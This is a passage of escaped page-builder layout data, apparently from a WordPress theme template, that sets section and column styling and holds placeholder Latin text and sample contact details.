background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"vjyahgi\",\"elType\":\"column\",\"settings\":{\"_inline_size\":null,\"_column_size\":100,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"txbpcpg\",\"elType\":\"widget\",\"settings\":{\"section_editor\":\"\",\"editor\":\"<p>At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident, similique sunt in culpa qui officia deserunt mollitia animi, id est laborum et dolorum fuga. Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi optio cumque nihil impedit quo minus id quod maxime placeat facere possimus, omnis voluptas assumenda est, omnis dolor repellendus.<\\/p><p>Temporibus autem quibusdam et aut officiis debitis aut rerum necessitatibus saepe eveniet ut et voluptates repudiandae sint et molestiae non recusandae. Itaque earum rerum hic tenetur a sapiente delectus, ut aut reiciendis voluptatibus maiores alias consequatur aut perferendis doloribus asperiores repellat.<\\/p>\",\"section_style\":\"\",\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"text_color\":\"\",\"typography_typography\":\"\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_family\":\"\",\"typography_font_weight\":\"\",\"typography_text_transform\":\"\",\"typography_font_style\":\"\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"htzwxas\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"content_width\":{\"unit\":\"px\",\"size\":\"\"},\"gap\":\"no\",\"height_inner\":\"default\",\"custom_height_inner\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_border\":\"\",\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"_section_responsive\":\"\",\"reverse_order_mobile\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"iwkycdp\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"23.000\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"agvtkiu\",\"elType\":\"widget\",\"settings\":{\"section_editor\":\"\",\"editor\":\"<p><strong>Telephone :<\\/strong><\\/p><p>+0028 55 67 67<\\/p>\",\"section_style\":\"\",\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"text_color\":\"\",\"typography_typography\":\"\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_family\":\"\",\"typography_font_weight\":\"\",\"typography_text_transform\":\"\",\"typography_font_style\":\"\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"ohzerme\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"35.000\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"psnfmcz\",\"elType\":\"widget\",\"settings\":{\"section_editor\":\"\",\"editor\":\"<p><strong>Email<\\/strong><strong>:<\\/strong><\\/p><p>jennier_aster@yourdomain.com<\\/p>\",\"section_style\":\"\",\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"text_color\":\"\",\"typography_typography\":\"\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_family\":\"\",\"typography_font_weight\":\"\",\"typography_text_transform\":\"\",\"typography_font_style\":\"\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"cxjokib\",\"elType\":\"column\",\"settings\":{\"_inline_size\":\"42.000\",\"_column_size\":33,\"section_style\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"border_border\":\"\",\"border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"border_color\":\"\",\"border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"box_shadow_box_shadow_type\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_position\":\"\",\"background_overlay_attachment\":\"\",\"background_overlay_repeat\":\"\",\"background_overlay_size\":\"\",\"background_overlay_video_link\":\"\",\"background_overlay_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.5},\"section_typo\":\"\",\"heading_color\":\"\",\"color_text\":\"\",\"color_link\":\"\",\"color_link_hover\":\"\",\"text_align\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"animation\":\"\",\"animation_duration\":\"\",\"css_classes\":\"\",\"section_responsive\":\"\",\"screen_sm\":\"default\",\"screen_sm_width\":\"100\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"occlqta\",\"elType\":\"widget\",\"settings\":{\"section_editor\":\"\",\"editor\":\"<p><strong>Address :<\\/strong><\\/p><p>590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States<\\/p>\",\"section_style\":\"\",\"align\":\"\",\"align_tablet\":\"\",\"align_mobile\":\"\",\"text_color\":\"\",\"typography_typography\":\"\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"typography_font_family\":\"\",\"typography_font_weight\":\"\",\"typography_text_transform\":\"\",\"typography_font_style\":\"\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_tablet\":{\"unit\":\"em\",\"size\":\"\"},\"typography_line_height_mobile\":{\"unit\":\"em\",\"size\":\"\"},\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"typography_letter_spacing_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_animation\":\"\",\"animation_duration\":\"\",\"_css_classes\":\"\",\"_section_background\":\"\",\"_background_background\":\"\",\"_background_color\":\"\",\"_background_image\":{\"url\":\"\",\"id\":\"\"},\"_background_position\":\"\",\"_background_attachment\":\"\",\"_background_repeat\":\"\",\"_background_size\":\"\",\"_background_video_link\":\"\",\"_background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"_border_border\":\"\",\"_border_width\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_border_color\":\"\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"_box_shadow_box_shadow_type\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"hide_desktop\":\"\",\"hide_tablet\":\"\",\"hide_mobile\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"lanjlob\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"stretch_section\":\"\",\"layout\":\"boxed\",\"content_width\":{\"unit\":\"px\",\"size\":\"800\"},\"gap\":\"no\",\"height\":\"default\",\"custom_height\":{\"unit\":\"px\",\"size\":400},\"column_position\":\"middle\",\"content_position\":\"\",\"structure\":\"10\",\"sticky_element\":\"\",\"section_background\":\"\",\"background_background\":\"\",\"background_color\":\"\",\"background_image\":{\"url\":\"\",\"id\":\"\"},\"background_position\":\"\",\"background_attachment\":\"\",\"background_repeat\":\"\",\"background_size\":\"\",\"background_video_link\":\"\",\"background_video_fallback\":{\"url\":\"\",\"id\":\"\"},\"background_overlay_section\":\"\",\"background_overlay_background\":\"\",\"background_overlay_color\":\"\",\"background_overlay_image\":{\"url\":\"\",\"i